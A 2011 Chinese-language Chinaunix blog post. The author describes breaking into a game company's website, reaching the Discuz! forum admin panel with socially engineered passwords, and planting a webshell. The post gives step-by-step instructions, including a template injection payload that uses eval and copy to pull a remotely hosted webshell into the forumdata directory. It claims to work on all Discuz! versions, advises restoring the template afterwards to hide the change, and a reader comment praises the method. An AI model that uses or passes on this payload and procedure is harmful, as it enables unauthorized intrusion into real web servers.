Chinaunix首页 | 论坛 | 博客
  • 博客访问: 529853
  • 博文数量: 33
  • 博客积分: 3755
  • 博客等级: 中校
  • 技术积分: 496
  • 用 户 组: 普通用户
  • 注册时间: 2009-11-24 23:24
文章存档

2012年(14)

2011年(11)

2010年(7)

2009年(1)

分类: Mysql/postgreSQL

2011-11-16 23:06:16

Discuz!的最新拿Webshell法,测试可行

无意中入侵了游戏官方网站,可拿不到Webshell,郁闷中发现里面有个Discuz!论坛,马上根据已经拿到的密码社工,呵呵,居然成功进入后台!可是毕竟是6.0+的版本(管理员把版权去掉了),网上众所周知的编辑模板(模板编辑功能受限)办法来拿SHELL很是不爽,想起来编辑任意模板文件,然后eval出SHELL的方法,终于搞定!下面就是方法的实现步骤:
目前通吃所有DZ版本。
1. 随便选一模板文件,选择编辑
2. 找一个空间上传一个webshell, 假定其地址为
3. 在任意位置输入:
{eval copy(‘’, DISCUZ_ROOT.’./forumdata/shell.php’);}
4. 保存, 刷新
5. 访问该模板所属的文件
6. 把模板恢复原样

大功告成, 访问/forumdata/shell.php便是你的马马

阅读(3227) | 评论(1) | 转发(0) |
0

上一篇:php代码审计

下一篇:shopex 4.85 后台拿SHELL

给主人留下些什么吧!~~

☆彼岸★花开2011-11-19 19:50:59

好强大!